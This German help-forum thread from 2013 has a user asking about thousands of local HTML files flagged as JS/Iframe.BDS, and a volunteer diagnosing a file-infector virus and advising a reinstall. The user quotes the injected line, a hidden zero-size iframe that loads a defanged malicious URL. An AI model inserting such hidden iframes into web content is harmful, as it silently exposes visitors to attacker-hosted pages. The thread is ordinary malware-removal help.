Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 25.01.2013, 12:36   #1
ilios
 
JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? - Standard

JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?



Hallo,
Avira findet 9577 infizierte HTML-Dateien auf meinem Rechner. Alle enthalten den Trojan "JS/iframe.BDS". Es handelt sich um lokale Webseiten eines ziemlich großen (ca. 50GB) Softwarepakets. Wenn ich die alle in den Virenkäfig sperre, kann ich die Software nicht mehr benutzen.

Die Webseiten enthalten immer dieselbe Zeile, und sie wurde HINTER dem HTML-Teil angefügt:

<HTML>
...
<HTML>
<iframe src=hxxp://www.3-0b6f-415d-b5c7-832f0.com:888/tj.htm width=0 height=0></iframe>

Kann sie dort überhaupt etwas bewirken?

Gibt es eine einfache Möglichkeit, den Trojaner-Code aus den betroffenen Webseiten zu entfernen? Ich meine nicht von Hand mit notepad.exe oder so.

Viele Grüße,
Ilios

EDIT: mit SearchReplaceMaster geht das glaub ich, und mit diesem Monstereditor, der in LISP geschrieben wurde, wie heißt der gleich noch?

EDIT2: ach ja, EMACS, aber dafür braucht man einen Führerschein. SearchReplaceMaster ist glaub ich einfacher, werd's nachher mal probieren.

Alt 25.01.2013, 12:52   #2
markusg
/// Malware-holic
 
JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? - Standard

JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?



hi
gabs noch andere Funde? ich würd mal behaupten, ihr habt einen file infektior auf dem pc, bzw evtl. falls firmen netz, im netzwerk (virus.Viking)
__________________

__________________

Alt 25.01.2013, 14:52   #3
ilios
 
JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? - Standard

JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?



Na ja, ich hab schon so einiges beseitigt. Angefangen hat alles mit einem Silly-Worm (WORM_VB.EQW) auf einem USB-Laufwerk. Ich dachte eigentlich, ich hätte Autostart ausgeschaltet, aber es muss wohl bei Systembereinigungsarbeiten wieder aktiviert worden sein.

Weil Avira den Silly nicht erkannt hat, hab ich Malwarebytes installiert. Der hat auch noch allerhand anderes böses Zeugs gefunden und beseitigt (Logfile hab ich noch).

Auf dem USB-Laufwerk war ein virtuelles System (vmplayer). Darin hab ich auch Malwarebytes installiert und laufen lassen, mit dem gleichen Ergebnis.

Dann habe ich das Programmpaket aus dem virtuellen System mit PCmover auf das Host-System übertragen. Erst da hat Avira die infizierten HTML-Dateien entdeckt.

Nun könnte man ja PCmover verdächtigen, ist aber sauber (sagt Avira).

Gruß,
Ilios
__________________

Geändert von ilios (25.01.2013 um 15:05 Uhr)

Alt 25.01.2013, 17:07   #4
markusg
/// Malware-holic
 
JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? - Standard

JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?



du kannst das system neu aufsetzen, du hast ein file infektor, den bekommst du nicht sicher aus dem system, da er sich an einige datei typen anhängt, und usb sticks würd ich auch nicht verwenden, die du an dem betroffenen system hattest, die sind wohl auch infiziert.
ist das n firmen gerät? bist du da der admin oder habt ihr ne it?
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 25.01.2013, 17:34   #5
ilios
 
JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? - Standard

JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?



Das ist auf einem Laptop, ich wurschtele ganz allein, ohne IT Abteilung :-)

Ein anderer Laptop, wo ich das Laufwerk mal "angesteckt" hatte, war dadurch auch infiziert worden, aber den hab ich mit Malwarebytes wieder clean bekommen. Andere Scanner finden da auch nichts mehr.

Also, ob der Silly-Worm den JS/Iframe.BDS übertragen hat, glaube ich eigentlich auch nicht, die Iframes könnten schon länger drauf gewesen sein.


Alt 25.01.2013, 17:37   #6
markusg
/// Malware-holic
 
JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? - Standard

JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?



Hi,
glauben ist hier auch nicht nötig, ich weis, dass diese einträge von den file infektoren stammen, die kannst du auch nicht mit malware bytes aufspüren bzw kann malware bytes solche Dateien gar nicht bereinigen.
alle sticks, die während der infektion angeschlossen waren, an beiden geräten, dürfen nicht an andere geräte, sie müssen formatiert werden.
auch die beiden Laptops
als firma hast du hoffendlich backups?
__________________
--> JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?

Antwort

Themen zu JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?
.com, brauch, dieselbe, einfacher, entferne, entfernen, enthalten, gefährlich, gefährlich?, große, infizierte, lokale, möglichkeit, nicht mehr, notepad.exe, sperre, troja, trojan, webseite, webseiten, überhaupt, zeile, ziemlich



Ähnliche Themen: JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?


  1. Möglicherweise Win32:Evo-gen & HTML:Iframe-inf
    Plagegeister aller Art und deren Bekämpfung - 19.08.2014 (14)
  2. URL:Mal und HTML:iframe-inf infektionen !
    Plagegeister aller Art und deren Bekämpfung - 05.04.2014 (11)
  3. Google Chrome blaue unterstrichene Wörter wo Links hinter versteckt sind, ich verzweifle
    Log-Analyse und Auswertung - 17.02.2014 (3)
  4. HTML:IFrame-K [Trj]
    Plagegeister aller Art und deren Bekämpfung - 24.01.2013 (8)
  5. Löschen HTML/Iframe.B.Gen
    Plagegeister aller Art und deren Bekämpfung - 27.11.2012 (1)
  6. HTML/Iframe.aho
    Plagegeister aller Art und deren Bekämpfung - 16.08.2012 (13)
  7. HTML/IFrame.aho und EXP/JAVA.Ternub.Gen
    Plagegeister aller Art und deren Bekämpfung - 19.07.2012 (21)
  8. html/iframe.b.gen virus BKA trojaner
    Plagegeister aller Art und deren Bekämpfung - 14.06.2012 (13)
  9. TR/Rootkit.gen und HTML/Iframe.adw.1
    Log-Analyse und Auswertung - 02.02.2012 (9)
  10. HTML:Iframe-gen
    Plagegeister aller Art und deren Bekämpfung - 12.10.2008 (2)
  11. HTML/IFrame.ktf' [virus]
    Mülltonne - 14.07.2008 (0)
  12. auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??
    Plagegeister aller Art und deren Bekämpfung - 12.05.2008 (12)
  13. Trojan-Clicker.HTML.IFrame.ob ???
    Log-Analyse und Auswertung - 21.04.2008 (1)
  14. HTML/IFrame.aaa.100
    Mülltonne - 17.01.2008 (0)
  15. Antivir Update funktioniert nicht (HTML/IFrame.Age.tih & HEUR/Exploit.HTML gefunden)
    Plagegeister aller Art und deren Bekämpfung - 05.12.2007 (1)
  16. Trojan-Clicker.HTML.IFrame.ag
    Plagegeister aller Art und deren Bekämpfung - 01.10.2007 (1)
  17. Trojan-Clicker.HTML.IFrame.h
    Log-Analyse und Auswertung - 01.08.2006 (1)

Zum Thema JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? - Hallo, Avira findet 9577 infizierte HTML-Dateien auf meinem Rechner. Alle enthalten den Trojan "JS/iframe.BDS". Es handelt sich um lokale Webseiten eines ziemlich großen (ca. 50GB) Softwarepakets. Wenn ich die alle - JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?...
Archiv
Du betrachtest: JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.